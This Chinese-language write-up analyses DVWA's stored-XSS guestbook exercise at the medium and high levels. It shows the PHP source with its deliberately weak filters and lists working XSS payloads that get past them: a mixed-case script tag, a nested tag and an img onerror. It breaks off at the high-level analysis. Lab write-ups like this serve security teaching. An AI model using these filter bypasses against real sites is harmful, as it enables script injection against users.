data:image/s3,"s3://crabby-images/ed8dd/ed8dd16c28e8c03f9dbf8995eb2419f7971a670e" alt="DVWA(xss部分源码分析)"
data:image/s3,"s3://crabby-images/39cc0/39cc0eb16e561da500443eab999026e39b582dca" alt="DVWA(xss部分源码分析)"
data:image/s3,"s3://crabby-images/15c52/15c5260506133a7dbdf7e81d2fafaffcbd14143f" alt="DVWA(xss部分源码分析)"
payload
name:Lmg66
message:<script>alert('http://www.likecs.com/xss')</script>
data:image/s3,"s3://crabby-images/91c41/91c410cb3d1c3489c561fba40c097a9eceeb993f" alt="DVWA(xss部分源码分析)"
级别:medium
查看源码:
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = strip_tags( addslashes( $message ) );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message );
// Sanitize name input
$name = str_replace( '<script>', '', $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
分析:
对name用str_replace()是区分大小写的,可以大写绕过,只是匹配了一次可以嵌套绕过,也可以使用其他的标签
对message,addslashes()函数在预定字符加/,strip_tags()函数剥去字符串中HTML,XML,以及php标签,htmlspecialchars()函数预定的函数转换为HTML实体,基本都过滤和转义了,所以突破name变量,name变量限制了输出长度,要F12更改name的maxlength
data:image/s3,"s3://crabby-images/2efc3/2efc35c97729a7cfd55377ee3c8a5f6ef5ea11a7" alt="DVWA(xss部分源码分析)"
data:image/s3,"s3://crabby-images/d1a06/d1a06d0f82fb6a59b3a110f873f71520aa7a083c" alt="DVWA(xss部分源码分析)"
data:image/s3,"s3://crabby-images/461ce/461ceeb40576ae7cbf71a7ffbc0a40b1e29a1efc" alt="DVWA(xss部分源码分析)"
data:image/s3,"s3://crabby-images/405a8/405a86c5196bdefcfa752852933cf570ebec1f72" alt="DVWA(xss部分源码分析)"
payload:
name:<Script>alert('http://www.likecs.com/xss')</script>
message:Lmg66
name:<s<script>cript>alert('http://www.likecs.com/xss')</script>
message:Lmg66
name:<img src='http://www.likecs.com/xss' onerror=alert('http://www.likecs.com/xss')>
message:Lmg66
级别:high
查看源码:
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = strip_tags( addslashes( $message ) );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message );
// Sanitize name input
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
分析: